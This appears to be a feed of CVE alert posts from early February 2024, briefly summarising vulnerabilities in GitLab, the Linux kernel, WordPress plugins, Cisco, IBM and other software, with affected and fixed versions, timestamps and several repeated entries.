🚨 CVE-2024-1066An issue has been discovered in GitLab EE affecting all versions from 13.3.0 prior to 16.6.7, 16.7 prior to 16.7.5, and 16.8 prior to 16.8.2 which allows an attacker to do a resource exhaustion using GraphQL `vulnerabilitiesCountByDay`🎖@cveNotify |
|
| 2024-02-07 22:37:25 |
🚨 CVE-2024-0690An information disclosure flaw was found in ansible-core due to a failure to respect the ANSIBLE_NO_LOG configuration in some scenarios. It was discovered that information is still included in the output in certain tasks, such as loop items. Depending on the task, this issue may include sensitive information, such as decrypted secret values.🎖@cveNotify |
|
| 2024-02-07 22:37:24 |
🚨 CVE-2023-4132A use-after-free vulnerability was found in the siano smsusb module in the Linux kernel. The bug occurs during device initialization when the siano device is plugged in. This flaw allows a local user to crash the system, causing a denial of service condition.🎖@cveNotify |
|
| 2024-02-07 22:07:33 |
🚨 CVE-2023-6535A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.🎖@cveNotify |
|
| 2024-02-07 22:07:32 |
🚨 CVE-2023-6356A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver and causing kernel panic and a denial of service.🎖@cveNotify |
|
| 2024-02-07 22:07:28 |
🚨 CVE-2023-38995An issue in SCHUHFRIED v.8.22.00 allows remote attacker to obtain the database password via crafted curl command.🎖@cveNotify |
|
| 2024-02-07 22:07:27 |
🚨 CVE-2024-24468Cross Site Request Forgery vulnerability in flusity-CMS v.2.33 allows a remote attacker to execute arbitrary code via the add_customblock.php.🎖@cveNotify |
|
| 2024-02-07 21:37:35 |
🚨 CVE-2023-6356A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver and causing kernel panic and a denial of service.🎖@cveNotify |
|
| 2024-02-07 21:37:28 |
🚨 CVE-2023-6610An out-of-bounds read vulnerability was found in smb2_dump_detail in fs/smb/client/smb2ops.c in the Linux Kernel. This issue could allow a local attacker to crash the system or leak internal kernel information.🎖@cveNotify |
|
| 2024-02-07 21:37:27 |
🚨 CVE-2023-6606An out-of-bounds read vulnerability was found in smbCalcSize in fs/smb/client/netmisc.c in the Linux Kernel. This issue could allow a local attacker to crash the system or leak internal kernel information.🎖@cveNotify |
|
| 2024-02-07 21:07:32 |
🚨 CVE-2024-1073The SlimStat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'filter_array' parameter in all versions up to, and including, 5.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-02-07 21:07:27 |
🚨 CVE-2024-23645GLPI is a Free Asset and IT Management Software package. A malicious URL can be used to execute XSS on reports pages. Upgrade to 10.0.12.🎖@cveNotify |
|
| 2024-02-07 21:07:26 |
🚨 CVE-2024-23744An issue was discovered in Mbed TLS 3.5.1. There is persistent handshake denial if a client sends a TLS 1.3 ClientHello without extensions.🎖@cveNotify |
|
| 2024-02-07 20:07:25 |
🚨 CVE-2023-47867MachineSense FeverWarn devices are configured as Wi-Fi hosts in a way that attackers within range could connect to the device's web services and compromise the device.🎖@cveNotify |
|
| 2024-02-07 20:07:24 |
🚨 CVE-2023-46706Multiple MachineSense devices have credentials unable to be changed by the user or administrator.🎖@cveNotify |
|
| 2024-02-07 19:37:25 |
🚨 CVE-2023-5178A use-after-free vulnerability was found in drivers/nvme/target/tcp.c` in `nvmet_tcp_free_crypto` due to a logical bug in the NVMe/TCP subsystem in the Linux kernel. This issue may allow a malicious user to cause a use-after-free and double-free problem, which may permit remote code execution or lead to local privilege escalation.🎖@cveNotify |
|
| 2024-02-07 19:37:24 |
🚨 CVE-2022-21668pipenv is a Python development workflow tool. Starting with version 2018.10.9 and prior to version 2022.1.8, a flaw in pipenv's parsing of requirements files allows an attacker to insert a specially crafted string inside a comment anywhere within a requirements.txt file, which will cause victims who use pipenv to install the requirements file to download dependencies from a package index server controlled by the attacker. By embedding malicious code in packages served from their malicious index server, the attacker can trigger arbitrary remote code execution (RCE) on the victims' systems. If an attacker is able to hide a malicious `--index-url` option in a requirements file that a victim installs with pipenv, the attacker can embed arbitrary malicious code in packages served from their malicious index server that will be executed on the victim's host during installation (remote code execution/RCE). When pip installs from a source distribution, any code in the setup.py is executed by the install process. This issue is patched in version 2022.1.8. The GitHub Security Advisory contains more information about this vulnerability.🎖@cveNotify |
|
| 2024-02-07 19:07:33 |
🚨 CVE-2022-20722Multiple vulnerabilities in the Cisco IOx application hosting environment on multiple Cisco platforms could allow an attacker to inject arbitrary commands into the underlying host operating system, execute arbitrary code on the underlying host operating system, install applications without being authenticated, or conduct a cross-site scripting (XSS) attack against a user of the affected software. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2024-02-07 19:07:29 |
🚨 CVE-2022-20721Multiple vulnerabilities in the Cisco IOx application hosting environment on multiple Cisco platforms could allow an attacker to inject arbitrary commands into the underlying host operating system, execute arbitrary code on the underlying host operating system, install applications without being authenticated, or conduct a cross-site scripting (XSS) attack against a user of the affected software. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2024-02-07 19:07:28 |
🚨 CVE-2022-20718Multiple vulnerabilities in the Cisco IOx application hosting environment on multiple Cisco platforms could allow an attacker to inject arbitrary commands into the underlying host operating system, execute arbitrary code on the underlying host operating system, install applications without being authenticated, or conduct a cross-site scripting (XSS) attack against a user of the affected software. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2024-02-07 19:07:27 |
🚨 CVE-2022-20681A vulnerability in the CLI of Cisco IOS XE Software for Cisco Catalyst 9000 Family Switches and Cisco Catalyst 9000 Family Wireless Controllers could allow an authenticated, local attacker to elevate privileges to level 15 on an affected device. This vulnerability is due to insufficient validation of user privileges after the user executes certain CLI commands. An attacker could exploit this vulnerability by logging in to an affected device as a low-privileged user and then executing certain CLI commands. A successful exploit could allow the attacker to execute arbitrary commands with level 15 privileges on the affected device.🎖@cveNotify |
|
| 2024-02-07 18:38:01 |
🚨 CVE-2024-24824Graylog is a free and open log management platform. Starting in version 2.0.0 and prior to versions 5.1.11 and 5.2.4, arbitrary classes can be loaded and instantiated using a HTTP PUT request to the `/api/system/cluster_config/` endpoint. Graylog's cluster config system uses fully qualified class names as config keys. To validate the existence of the requested class before using them, Graylog loads the class using the class loader. If a user with the appropriate permissions performs the request, arbitrary classes with 1-arg String constructors can be instantiated. This will execute arbitrary code that is run during class instantiation. In the specific use case of `java.io.File`, the behavior of the internal web-server stack will lead to information exposure by including the entire file content in the response to the REST request. Versions 5.1.11 and 5.2.4 contain a fix for this issue.🎖@cveNotify |
|
| 2024-02-07 18:37:56 |
🚨 CVE-2024-24822Pimcore's Admin Classic Bundle provides a backend user interface for Pimcore. Prior to version 1.3.3, an attacker can create, delete etc. tags without having the permission to do so. A fix is available in version 1.3.3. As a workaround, one may apply the patch manually.🎖@cveNotify |
|
| 2024-02-07 18:37:55 |
🚨 CVE-2024-21860in OpenHarmony v4.0.0 and prior versionsallow an adjacent attacker arbitrary code execution in any apps through use after free.🎖@cveNotify |
|
| 2024-02-07 18:37:50 |
🚨 CVE-2024-0285in OpenHarmony v4.0.0 and prior versions allow a local attacker cause DOS through improper input.🎖@cveNotify |
|
| 2024-02-07 18:37:49 |
🚨 CVE-2023-45734in OpenHarmony v3.2.4 and prior versions allow an adjacent attacker arbitrary code execution through out-of-bounds write.🎖@cveNotify |
|
| 2024-02-07 18:37:44 |
🚨 CVE-2021-34705A vulnerability in the Voice Telephony Service Provider (VTSP) service of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to bypass configured destination patterns and dial arbitrary numbers. This vulnerability is due to insufficient validation of dial strings at Foreign Exchange Office (FXO) interfaces. An attacker could exploit this vulnerability by sending a malformed dial string to an affected device via either the ISDN protocol or SIP. A successful exploit could allow the attacker to conduct toll fraud, resulting in unexpected financial impact to affected customers.🎖@cveNotify |
|
| 2024-02-07 18:07:43 |
🚨 CVE-2023-38369IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 does not require that docker images should have strong passwords by default, which makes it easier for attackers to compromise user accounts. IBM X-Force ID: 261196.🎖@cveNotify |
|
| 2024-02-07 18:07:42 |
🚨 CVE-2023-32328IBM Security Verify Access 10.0.0.0 through 10.0.6.1 uses insecure protocols in some instances that could allow an attacker on the network to take control of the server. IBM X-Force Id: 254957.🎖@cveNotify |
|
| 2024-02-07 18:07:41 |
🚨 CVE-2023-31002IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 temporarily stores sensitive information in files that could be accessed by a local user. IBM X-Force ID: 254657.🎖@cveNotify |
|
| 2024-02-07 18:07:37 |
🚨 CVE-2023-47561A cross-site scripting (XSS) vulnerability has been reported to affect Photo Station. If exploited, the vulnerability could allow authenticated users to inject malicious code via a network.We have already fixed the vulnerability in the following version:Photo Station 6.4.2 ( 2023/12/15 ) and later🎖@cveNotify |
|
| 2024-02-07 18:07:36 |
🚨 CVE-2024-0685The Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPress plugin for WordPress is vulnerable to Second Order SQL Injection via the email address value submitted through forms in all versions up to, and including, 3.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to inject SQL in their email address that will append additional into the already existing query when an administrator triggers a personal data export.🎖@cveNotify |
|
| 2024-02-07 18:07:31 |
🚨 CVE-2024-22901Vinchin Backup & Recovery v7.2 was discovered to use default MYSQL credentials.🎖@cveNotify |
|
| 2024-02-07 18:07:30 |
🚨 CVE-2022-3647** DISPUTED ** A vulnerability, which was classified as problematic, was found in Redis up to 6.2.7/7.0.5. Affected is the function sigsegvHandler of the file debug.c of the component Crash Report. The manipulation leads to denial of service. The complexity of an attack is rather high. The exploitability is told to be difficult. The real existence of this vulnerability is still doubted at the moment. Upgrading to version 6.2.8 and 7.0.6 is able to address this issue. The patch is identified as 0bf90d944313919eb8e63d3588bf63a367f020a3. It is recommended to apply a patch to fix this issue. VDB-211962 is the identifier assigned to this vulnerability. NOTE: The vendor claims that this is not a DoS because it applies to the crash logging mechanism which is triggered after a crash has occurred.🎖@cveNotify |
|
| 2024-02-07 18:07:26 |
🚨 CVE-2009-1378Multiple memory leaks in the dtls1_process_out_of_seq_message function in ssl/d1_both.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allow remote attackers to cause a denial of service (memory consumption) via DTLS records that (1) are duplicates or (2) have sequence numbers much greater than current sequence numbers, aka "DTLS fragment handling memory leak."🎖@cveNotify |
|
| 2024-02-07 18:07:25 |
🚨 CVE-1999-0293AAA authentication on Cisco systems allows attackers to execute commands without authorization.🎖@cveNotify |
|
| 2024-02-07 17:07:58 |
🚨 CVE-2024-25145Stored cross-site scripting (XSS) vulnerability in the Portal Search module's Search Result app in Liferay Portal 7.2.0 through 7.4.3.11, and older unsupported versions, and Liferay DXP 7.4 before update 8, 7.3 before update 4, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML into the Search Result app's search result if highlighting is disabled by adding any searchable content (e.g., blog, message board message, web content article) to the application.🎖@cveNotify |
|
| 2024-02-07 17:07:57 |
🚨 CVE-2024-24812Frappe is a full-stack web application framework that uses Python and MariaDB on the server side and a tightly integrated client side library. Prior to versions 14.59.0 and 15.5.0, portal pages are susceptible to Cross-Site Scripting (XSS) which can be used to inject malicious JS code if user clicks on a malicious link. This vulnerability has been patched in versions 14.59.0 and 15.5.0. No known workarounds are available.🎖@cveNotify |
|
| 2024-02-07 17:07:56 |
🚨 CVE-2024-24811SQLAlchemyDA is a generic database adapter for ZSQL methods. A vulnerability found in versions prior to 2.2 allows unauthenticated execution of arbitrary SQL statements on the database to which the SQLAlchemyDA instance is connected. All users are affected. The problem has been patched in version 2.2. There is no workaround for the problem.🎖@cveNotify |
|
| 2024-02-07 17:07:53 |
🚨 CVE-2024-24771Open Forms allows users create and publish smart forms. Versions prior to 2.2.9, 2.3.7, 2.4.5, and 2.5.2 contain a non-exploitable multi-factor authentication weakness. Superusers who have their credentials (username + password) compromised could potentially have the second-factor authentication bypassed if an attacker somehow managed to authenticate to Open Forms. The maintainers of Open Forms do not believe it is or has been possible to perform this login. However, if this were possible, the victim's account may be abused to view (potentially sensitive) submission data or have been used to impersonate other staff accounts to view and/or modify data. Three mitigating factors to help prevent exploitation include: the usual login page (at `/admin/login/`) does not fully log in the user until the second factor was succesfully provided; the additional non-MFA protected login page at `/api/v2/api-authlogin/` was misconfigured and could not be used to log in; and there are no additional ways to log in. This also requires credentials of a superuser to be compromised to be exploitable. Versions 2.2.9, 2.3.7, 2.4.5, and 2.5.2 contain the following patches to address these weaknesses: Move and only enable the API auth endpoints (`/api/v2/api-auth/login/`) with `settings.DEBUG = True`. `settings.DEBUG = True` is insecure and should never be applied in production settings. Additionally, apply a custom permission check to the hijack flow to only allow second-factor-verified superusers to perform user hijacking.🎖@cveNotify |
|
| 2024-02-07 17:07:52 |
🚨 CVE-2024-25201Espruino 2v20 (commit fcc9ba4) was discovered to contain an Out-of-bounds Read via jsvStringIteratorPrintfCallback at src/jsvar.c.🎖@cveNotify |
|
| 2024-02-07 17:07:51 |
🚨 CVE-2024-24189Jsish v3.5.0 (commit 42c694c) was discovered to contain a use-after-free via the SplitChar at ./src/jsiUtils.c.🎖@cveNotify |
|
| 2024-02-07 17:07:50 |
🚨 CVE-2024-24188Jsish v3.5.0 was discovered to contain a heap-buffer-overflow in ./src/jsiUtils.c.🎖@cveNotify |
|
| 2024-02-07 17:07:47 |
🚨 CVE-2024-24186Jsish v3.5.0 (commit 42c694c) was discovered to contain a stack-overflow via the component IterGetKeysCallback at /jsish/src/jsiValue.c.🎖@cveNotify |
|
| 2024-02-07 17:07:46 |
🚨 CVE-2024-24133Atmail v6.6.0 was discovered to contain a SQL injection vulnerability via the username parameter on the login page.🎖@cveNotify |
|
| 2024-02-07 17:07:45 |
🚨 CVE-2023-31006IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to a denial of service attacks on the DSC server. IBM X-Force ID: 254776.🎖@cveNotify |
|
| 2024-02-07 17:07:41 |
🚨 CVE-2023-51669Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Artios Media Product Code for WooCommerce allows Stored XSS.This issue affects Product Code for WooCommerce: from n/a through 1.4.4.🎖@cveNotify |
|
| 2024-02-07 17:07:40 |
🚨 CVE-2023-51548Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Neil Gee SlickNav Mobile Menu allows Stored XSS.This issue affects SlickNav Mobile Menu: from n/a through 1.9.2.🎖@cveNotify |
|
| 2024-02-07 17:07:39 |
🚨 CVE-2023-51540Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kunal Nagar Custom 404 Pro allows Stored XSS.This issue affects Custom 404 Pro: from n/a through 3.10.0.🎖@cveNotify |
|
| 2024-02-07 16:07:54 |
🚨 CVE-2023-31005IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a local user to escalate their privileges due to an improper security configuration. IBM X-Force ID: 254767.🎖@cveNotify |
|
| 2024-02-07 15:37:34 |
🚨 CVE-2024-24812Frappe is a full-stack web application framework that uses Python and MariaDB on the server side and a tightly integrated client side library. Prior to versions 14.59.0 and 15.5.0, portal pages are susceptible to Cross-Site Scripting (XSS) which can be used to inject malicious JS code if user clicks on a malicious link. This vulnerability has been patched in versions 14.59.0 and 15.5.0. No known workarounds are available.🎖@cveNotify |
|
| 2024-02-07 15:37:33 |
🚨 CVE-2024-24771Open Forms allows users create and publish smart forms. Versions prior to 2.2.9, 2.3.7, 2.4.5, and 2.5.2 contain a non-exploitable multi-factor authentication weakness. Superusers who have their credentials (username + password) compromised could potentially have the second-factor authentication bypassed if an attacker somehow managed to authenticate to Open Forms. The maintainers of Open Forms do not believe it is or has been possible to perform this login. However, if this were possible, the victim's account may be abused to view (potentially sensitive) submission data or have been used to impersonate other staff accounts to view and/or modify data. Three mitigating factors to help prevent exploitation include: the usual login page (at `/admin/login/`) does not fully log in the user until the second factor was succesfully provided; the additional non-MFA protected login page at `/api/v2/api-authlogin/` was misconfigured and could not be used to log in; and there are no additional ways to log in. This also requires credentials of a superuser to be compromised to be exploitable. Versions 2.2.9, 2.3.7, 2.4.5, and 2.5.2 contain the following patches to address these weaknesses: Move and only enable the API auth endpoints (`/api/v2/api-auth/login/`) with `settings.DEBUG = True`. `settings.DEBUG = True` is insecure and should never be applied in production settings. Additionally, apply a custom permission check to the hijack flow to only allow second-factor-verified superusers to perform user hijacking.🎖@cveNotify |
|
| 2024-02-07 15:07:26 |
🚨 CVE-2024-23108An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.1.0 through 7.1.1 and 7.0.0 through 7.0.2 and 6.7.0 through 6.7.8 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.2 and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via via crafted API requests.🎖@cveNotify |
|
| 2024-02-07 15:07:25 |
🚨 CVE-2023-32329IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a user to download files from an incorrect repository due to improper file validation. IBM X-Force ID: 254972.🎖@cveNotify |
|
| 2024-02-07 15:07:24 |
🚨 CVE-2023-31004IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a remote attacker to gain access to the underlying system using man in the middle techniques. IBM X-Force ID: 254765.🎖@cveNotify |
|
| 2024-02-07 14:37:47 |
🚨 CVE-2024-25201Espruino 2v20 (commit fcc9ba4) was discovered to contain an Out-of-bounds Read via jsvStringIteratorPrintfCallback at src/jsvar.c.🎖@cveNotify |
|
| 2024-02-07 14:37:43 |
🚨 CVE-2024-24189Jsish v3.5.0 (commit 42c694c) was discovered to contain a use-after-free via the SplitChar at ./src/jsiUtils.c.🎖@cveNotify |
|
| 2024-02-07 14:37:42 |
🚨 CVE-2024-24186Jsish v3.5.0 (commit 42c694c) was discovered to contain a stack-overflow via the component IterGetKeysCallback at /jsish/src/jsiValue.c.🎖@cveNotify |
|
| 2024-02-07 14:37:41 |
🚨 CVE-2024-24133Atmail v6.6.0 was discovered to contain a SQL injection vulnerability via the username parameter on the login page.🎖@cveNotify |
|
| 2024-02-07 14:37:38 |
🚨 CVE-2024-24131SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.🎖@cveNotify |
|
| 2024-02-07 14:37:37 |
🚨 CVE-2024-1039Gessler GmbH WEB-MASTER has a restoration account that uses weak hard coded credentials and if exploited could allow an attacker control over the web management of the device.🎖@cveNotify |
|
| 2024-02-07 14:37:36 |
🚨 CVE-2023-47257ConnectWise ScreenConnect through 23.8.4 allows man-in-the-middle attackers to achieve remote code execution via crafted messages.🎖@cveNotify |
|
| 2024-02-07 12:37:41 |
🚨 CVE-2022-47436Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MantraBrain Yatra allows Stored XSS.This issue affects Yatra: from n/a through 2.1.14.🎖@cveNotify |
|
| 2024-02-07 11:37:31 |
🚨 CVE-2024-1118The Podlove Subscribe button plugin for WordPress is vulnerable to UNION-based SQL Injection via the 'button' attribute of the podlove-subscribe-button shortcode in all versions up to, and including, 1.3.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-02-07 11:37:30 |
🚨 CVE-2024-1109The Podlove Podcast Publisher plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the init_download() and init() functions in all versions up to, and including, 4.0.11. This makes it possible for unauthenticated attackers to export the plugin's tracking data and podcast information.🎖@cveNotify |
|
| 2024-02-07 10:37:32 |
🚨 CVE-2023-51437Observable timing discrepancy vulnerability in Apache Pulsar SASL Authentication Provider can allow an attacker to forge a SASL Role Token that will pass signature verification.Users are recommended to upgrade to version 2.11.3, 3.0.2, or 3.1.1 which fixes the issue. Users should also consider updating the configured secret in the `saslJaasServerRoleTokenSignerSecretPath` file.Any component matching an above version running the SASL Authentication Provider is affected. That includes the Pulsar Broker, Proxy, Websocket Proxy, or Function Worker.2.11 Pulsar users should upgrade to at least 2.11.3.3.0 Pulsar users should upgrade to at least 3.0.2.3.1 Pulsar users should upgrade to at least 3.1.1.Any users running Pulsar 2.8, 2.9, 2.10, and earlier should upgrade to one of the above patched versions.For additional details on this attack vector, please refer to https://codahale.com/a-lesson-in-timing-attacks/ .🎖@cveNotify |
|
| 2024-02-07 09:37:39 |
🚨 CVE-2024-24311Path Traversal vulnerability in Linea Grafica "Multilingual and Multistore Sitemap Pro - SEO" (lgsitemaps) module for PrestaShop before version 1.6.6, a guest can download personal information without restriction.🎖@cveNotify |
|
| 2024-02-07 09:37:38 |
🚨 CVE-2023-46914SQL Injection vulnerability in RM bookingcalendar module for PrestaShop versions 2.7.9 and before, allows remote attackers to execute arbitrary code, escalate privileges, and obtain sensitive information via ics_export.php.🎖@cveNotify |
|
| 2024-02-07 08:37:36 |
🚨 CVE-2024-1079The Quiz Maker plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ays_show_results() function in all versions up to, and including, 6.5.2.4. This makes it possible for unauthenticated attackers to fetch arbitrary quiz results which can contain PII.🎖@cveNotify |
|
| 2024-02-07 08:37:35 |
🚨 CVE-2023-40355Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.🎖@cveNotify |
|
| 2024-02-07 07:37:25 |
🚨 CVE-2024-1037The All-In-One Security (AIOS) – Security and Firewall plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 5.2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-02-07 07:37:24 |
🚨 CVE-2024-0628The WP RSS Aggregator plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.23.5 via the RSS feed source in admin settings. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.🎖@cveNotify |
|
| 2024-02-07 05:37:28 |
🚨 CVE-2024-0256The Starbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Profile Display Name and Social Settings in all versions up to, and including, 3.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-02-07 04:37:25 |
🚨 CVE-2024-23447An issue was discovered in the Windows Network Drive Connector when using Document Level Security to assign permissions to a file, with explicit allow write and deny read. Although the document is not accessible to the user in Network Drive it is visible in search applications to the user.🎖@cveNotify |
|
| 2024-02-07 04:37:24 |
🚨 CVE-2024-23446An issue was discovered by Elastic, whereby the Detection Engine Search API does not respect Document-level security (DLS) or Field-level security (FLS) when querying the .alerts-security.alerts-{space_id} indices. Users who are authorized to call this API may obtain unauthorized access to documents if their roles are configured with DLS or FLS against the aforementioned index.🎖@cveNotify |
|
| 2024-02-07 03:37:27 |
🚨 CVE-2023-6388Suite CRM version 7.14.2 allows making arbitrary HTTP requests throughthe vulnerable server. This is possible because the application is vulnerableto SSRF.🎖@cveNotify |
|
| 2024-02-07 02:37:25 |
🚨 CVE-2024-1268A vulnerability, which was classified as critical, was found in CodeAstro Restaurant POS System 1.0. This affects an unknown part of the file update_product.php. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-253011.🎖@cveNotify |
|
| 2024-02-07 02:07:28 |
🚨 CVE-2023-4762Type Confusion in V8 in Google Chrome prior to 116.0.5845.179 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-02-07 01:37:36 |
🚨 CVE-2024-1257A vulnerability was found in Jspxcms 10.2.0. It has been classified as problematic. Affected is an unknown function of the file /ext/collect/find_text.do. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252996.🎖@cveNotify |
|
| 2024-02-07 01:37:30 |
🚨 CVE-2024-1256A vulnerability was found in Jspxcms 10.2.0 and classified as problematic. This issue affects some unknown processing of the file /ext/collect/filter_text.do. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252995.🎖@cveNotify |
|
| 2024-02-07 01:37:29 |
🚨 CVE-2024-1048A flaw was found in the grub2-set-bootflag utility of grub2. After the fix of CVE-2019-14865, grub2-set-bootflag will create a temporary file with the new grubenv content and rename it to the original grubenv file. If the program is killed before the rename operation, the temporary file will not be removed and may fill the filesystem when invoked multiple times, resulting in a filesystem out of free inodes or blocks.🎖@cveNotify |
|
| 2024-02-07 01:37:28 |
🚨 CVE-2023-40545Authentication bypass when an OAuth2 Client is using client_secret_jwt as its authentication method on affected 11.3 versions via specially crafted requests.🎖@cveNotify |
|
| 2024-02-07 00:37:32 |
🚨 CVE-2024-1283Heap buffer overflow in Skia in Google Chrome prior to 121.0.6167.160 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-02-07 00:37:26 |
🚨 CVE-2024-1265A vulnerability classified as problematic has been found in CodeAstro University Management System 1.0. Affected is an unknown function of the file /att_add.php of the component Attendance Management. The manipulation of the argument Student Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-253008.🎖@cveNotify |
|
| 2024-02-07 00:37:25 |
🚨 CVE-2024-0955A stored XSS vulnerability exists where an authenticated, remote attacker with administrator privileges on the Nessus application could alter Nessus proxy settings, which could lead to the execution of remote arbitrary scripts.🎖@cveNotify |
|
| 2024-02-07 00:37:24 |
🚨 CVE-2023-6238A buffer overflow vulnerability was found in the NVM Express (NVMe) driver in the Linux kernel. Only privileged user could specify a small meta buffer and let the device perform larger Direct Memory Access (DMA) into the same buffer, overwriting unrelated kernel memory, causing random kernel crashes and memory corruption.🎖@cveNotify |
|
| 2024-02-06 23:37:25 |
🚨 CVE-2024-1263A vulnerability, which was classified as critical, was found in Juanpao JPShop up to 1.5.02. Affected is the function actionUpdate of the file /api/controllers/merchant/shop/PosterController.php of the component API. The manipulation of the argument pic_url leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-253002 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-06 23:37:24 |
🚨 CVE-2024-1262A vulnerability, which was classified as critical, has been found in Juanpao JPShop up to 1.5.02. This issue affects the function actionUpdate of the file /api/controllers/merchant/design/MaterialController.php of the component API. The manipulation of the argument pic_url leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-253001 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-06 22:37:32 |
🚨 CVE-2023-45222An attacker with access to the web application that has the vulnerable software could introduce arbitrary JavaScript by injecting a cross-site scripting payload into the "autorefresh" parameter.🎖@cveNotify |
|
| 2024-02-06 22:37:26 |
🚨 CVE-2023-45213A potential attacker with access to the Westermo Lynx device would be able to execute malicious code that could affect the correct functioning of the device.🎖@cveNotify |
|
| 2024-02-06 22:37:25 |
🚨 CVE-2023-40143An attacker with access to the Westermo Lynx web application that has the vulnerable software could introduce arbitrary JavaScript by injecting a cross-site scripting payload into the "forward.0.domain" parameter.🎖@cveNotify |
|
| 2024-02-06 22:37:24 |
🚨 CVE-2023-38579The cross-site request forgery token in the request may be predictable or easily guessable allowing attackers to craft a malicious request, which could be triggered by a victim unknowingly. In a successful CSRF attack, the attacker could lead the victim user to carry out an action unintentionally.🎖@cveNotify |
|
| 2024-02-06 21:37:32 |
🚨 CVE-2023-30999IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow an attacker to cause a denial of service due to uncontrolled resource consumption. IBM X-Force ID: 254651.🎖@cveNotify |
|
| 2024-02-06 21:37:25 |
🚨 CVE-2024-23941Cross-site scripting vulnerability exists in Group Office prior to v6.6.182, prior to v6.7.64 and prior to v6.8.31, which may allow a remote authenticated attacker to execute an arbitrary script on the web browser of the user who is logging in to the product.🎖@cveNotify |
|
| 2024-02-06 21:37:24 |
